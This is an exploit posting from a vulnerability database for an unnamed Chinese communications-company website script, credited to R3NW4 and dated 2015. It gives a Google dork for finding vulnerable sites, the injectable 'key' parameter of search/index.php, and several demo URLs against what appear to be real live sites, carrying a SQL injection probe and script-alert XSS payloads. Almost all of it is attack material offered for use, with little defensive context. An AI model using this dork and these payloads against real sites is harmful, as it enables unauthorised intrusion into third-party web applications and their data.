Chinese Script SQLi XSS

2015.08.04
Credit: R3NW4
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-89
Dork: 通信设备公司网站 Copyright(C)2009-2010

# Exploit Title: [Chinese Script SQLi+XSS] # Google Dork: [通信设备公司网站 Copyright(C)2009-2010] # Date: [13-7-2015] # Exploit Author: [R3NW4] # Platform: (WebApps) # Version: [All Versions] # Tested on: [Linux(Debian)] # Greetz: All Kurdish Hackers - Kurdistan - Peshmarga ----------------------- SQL: Site.com/Path/search/index.php?imageField.x=0&imageField.y=0&key=[SQL] XSS: Site.com/Path/search/index.php?imageField.x=0&imageField.y=0&key=[XSS] ------------------------ Demo: http://verypXos.Xcn/search/index.php?imageField.x=0&imageField.y=0&key=1' http://4037.wXebmall.yunhosting.com/search/index.php?imageField.x=0&imageField.y=0&key=1' http://demo.Xgotohost2.com/3005/search/index.php?imageField.x=0&imageField.y=0&key=1' http://4037X.webmall.yunhosting.com/search/index.php?imageField.x=8&imageField.y=3&key=%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E http://027X10010.net/search/index.php?a=0&imageField=%3Cscript%3Ealert%28%2FXSSPOSED%2F%29%3B%3C%2Fscript%3E&key=%22%3E%3Cscript%3Ealert%28%2FXSSPOSED%2F%29%3B%3C%2Fscript%3E ------------------------- https://twitter.com/R3NW4 0x3r3nw4@gmail.com


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top